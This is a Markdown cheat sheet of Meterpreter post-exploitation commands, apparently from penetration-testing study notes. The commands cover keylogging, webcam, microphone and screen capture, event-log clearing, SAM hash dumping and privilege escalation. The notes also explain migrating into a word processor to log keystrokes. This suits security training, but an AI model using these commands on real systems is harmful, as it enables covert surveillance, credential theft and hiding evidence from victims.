74 lines
4.1 KiB
Markdown
74 lines
4.1 KiB
Markdown
|
## Top Commands
|
|||
|
**Meterpreter Commands**
|
|||
|
```Terminal
|
|||
|
sessions -u NUMBER ---> Turn Shell into Meterpreter session
|
|||
|
|
|||
|
run ---> Executes a Meterpreter script or Post module
|
|||
|
sessions ---> Quickly switch to another session
|
|||
|
migrate ---> Allows you to migrate Meterpreter to another process
|
|||
|
background ---> Backgrounds the current session
|
|||
|
exit ---> Terminate the Meterpreter session
|
|||
|
|
|||
|
help ---> Displays the help menu
|
|||
|
info ---> Displays information about a Post module
|
|||
|
irb ---> Opens an interactive Ruby shell on the current session
|
|||
|
load ---> Loads one or more Meterpreter extensions
|
|||
|
|
|||
|
#Networking commands
|
|||
|
|
|||
|
arp ---> Displays the host ARP (Address Resolution Protocol) cache
|
|||
|
ifconfig ---> Displays network interfaces available on the target system
|
|||
|
|
|||
|
netstat ---> Displays the network connections
|
|||
|
portfwd ---> Forwards a local port to a remote service
|
|||
|
route ---> Allows you to view and modify the routing table
|
|||
|
resolve X_Y ---> Check DNS of local network to find a host IP
|
|||
|
|
|||
|
#System commands
|
|||
|
|
|||
|
clearev ---> Clears the event logs
|
|||
|
execute ---> Executes a command
|
|||
|
getpid ---> Shows the current process identifier
|
|||
|
getuid ---> Shows the user that Meterpreter is running as
|
|||
|
kill ---> Terminates a process
|
|||
|
pkill ---> Terminates processes by name
|
|||
|
ps ---> Lists running processes
|
|||
|
reboot ---> Reboots the remote computer
|
|||
|
shell ---> Drops into a system command shell
|
|||
|
shutdown ---> Shuts down the remote computer
|
|||
|
sysinfo ---> Gets information about the remote system, such as OS
|
|||
|
|
|||
|
#Others Commands (Listed under different menu categories in the help section)
|
|||
|
|
|||
|
idletime ---> Returns the number of seconds the remote user has been idle
|
|||
|
keyscan_dump ---> Dumps the keystroke buffer
|
|||
|
keyscan_start ---> Starts capturing keystrokes
|
|||
|
keyscan_stop ---> Stops capturing keystrokes
|
|||
|
screenshare ---> Allows you to watch the remote user's desktop in real time
|
|||
|
screenshot ---> Grabs a screenshot of the interactive desktop
|
|||
|
record_mic ---> Records audio from the default microphone for X seconds
|
|||
|
webcam_chat ---> Starts a video chat
|
|||
|
webcam_list ---> Lists webcams
|
|||
|
webcam_snap ---> Takes a snapshot from the specified webcam
|
|||
|
webcam_stream ---> Plays a video stream from the specified webcam
|
|||
|
getsystem ---> Attempts to elevate your privilege to that of local system
|
|||
|
hashdump ---> Dumps the contents of the SAM database
|
|||
|
```
|
|||
|
|
|||
|
- Meterpreter Migration Shell
|
|||
|
|
|||
|
Migrating to another process will help Meterpreter interact with it. For example, if you see a word processor running on the target (e.g. word.exe, notepad.exe, etc.), you can migrate to it and start capturing keystrokes sent by the user to this process. Some Meterpreter versions will offer you the `keyscan_start`, `keyscan_stop`, and `keyscan_dump` command options to make Meterpreter act like a keylogger. Migrating to another process may also help you to have a more stable Meterpreter session. If you migrate in process id of browser, it might even be possible to inject elements in the web page.
|
|||
|
|
|||
|
To migrate the session, you can use the `migrate` command and specify the PID of the target process. For example, if you wanted to migrate the session to the process with PID 1234, you would use the following command:
|
|||
|
|
|||
|
The migrate command
|
|||
|
```shell-session
|
|||
|
- meterpreter > migrate 1234
|
|||
|
[*] Migrating from 1304 to 1234...
|
|||
|
[*] Migration completed successfully.
|
|||
|
meterpreter >
|
|||
|
```
|
|||
|
|
|||
|
When you migrate the session to a different process, the payload is injected into the target process and begins executing within its context. This means that the payload is now running within the same process as the target process, and has the same privileges and access to resources as the target process. We can think about this has both PID that fuse together!
|
|||
|
|
|||
|
Be careful; you may lose your user privileges if you migrate from a higher privileged (e.g. SYSTEM) user to a process started by a lower privileged user (e.g. webserver). You may not be able to gain them back.
|